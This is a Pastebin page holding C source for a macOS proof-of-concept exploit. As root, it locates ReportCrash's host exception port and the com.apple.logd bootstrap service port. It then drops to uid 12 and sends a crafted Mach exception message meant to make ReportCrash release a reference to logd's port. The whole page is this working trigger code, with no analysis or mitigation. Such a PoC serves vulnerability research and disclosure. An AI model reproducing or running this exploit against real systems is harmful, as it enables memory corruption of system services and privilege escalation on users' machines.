Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include <stdio.h>
- #include <stdlib.h>
- #include <unistd.h>
- #include <servers/bootstrap.h>
- #include <mach/mach.h>
- #include <mach/task.h>
- #include "mach_exc.h"
- #include <mach/exception_types.h>
- void drop_ref(mach_port_t report_crash_port, mach_port_t target_port) {
- int flavor = 0;
- mach_msg_type_number_t new_stateCnt = 0;
- kern_return_t err = mach_exception_raise_state_identity(
- report_crash_port,
- target_port,
- MACH_PORT_NULL,
- 0,
- 0,
- 0,
- &flavor,
- NULL,
- 0,
- NULL,
- &new_stateCnt);
- }
- int main() {
- int uid = getuid();
- if (uid != 0) {
- printf("this PoC should be run as root\n");
- return 0;
- }
- // take a look at our exception ports:
- exception_mask_t masks[EXC_TYPES_COUNT] = {0};
- mach_msg_type_number_t count = EXC_TYPES_COUNT;
- mach_port_t ports[EXC_TYPES_COUNT] = {0};
- exception_behavior_t behaviors[EXC_TYPES_COUNT] = {0};
- thread_state_flavor_t flavors[EXC_TYPES_COUNT] = {0};
- kern_return_t err = host_get_exception_ports(mach_host_self(),
- //kern_return_t err = task_get_exception_ports(mach_task_self(),
- EXC_MASK_ALL,
- masks,
- &count,
- ports,
- behaviors,
- flavors);
- if (err != KERN_SUCCESS) {
- printf("failed to get the exception ports\n");
- return 0;
- }
- printf("count: %d\n", count);
- mach_port_t report_crash_port = MACH_PORT_NULL;
- for (int i = 0; i < count; i++) {
- mach_port_t port = ports[i];
- exception_mask_t mask = masks[i];
- printf("port: %x %08x\n", port, mask);
- if (mask & (1 << EXC_RESOURCE)) {
- report_crash_port = port;
- }
- }
- if (report_crash_port == MACH_PORT_NULL) {
- printf("couldn't find ReportCrash port\n");
- return 0;
- }
- printf("report crash port: 0x%x\n", report_crash_port);
- // the port we will target:
- mach_port_t bs = MACH_PORT_NULL;
- task_get_bootstrap_port(mach_task_self(), &bs);
- printf("targeting bootstrap port: %x\n", bs);
- mach_port_t service_port = MACH_PORT_NULL;
- err = bootstrap_look_up(bs, "com.apple.logd", &service_port);
- if(err != KERN_SUCCESS){
- printf("unable to look up target service\n");
- return 0;
- }
- printf("got service: 0x%x\n", service_port);
- // triggering the bug requires that we send from a different uid
- // drop to everyone(12)
- int setuiderr = setuid(12);
- if (setuiderr != 0) {
- printf("setuid failed...\n");
- return 0;
- }
- printf("dropped to uid 12\n");
- drop_ref(report_crash_port, service_port);
- return 0;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement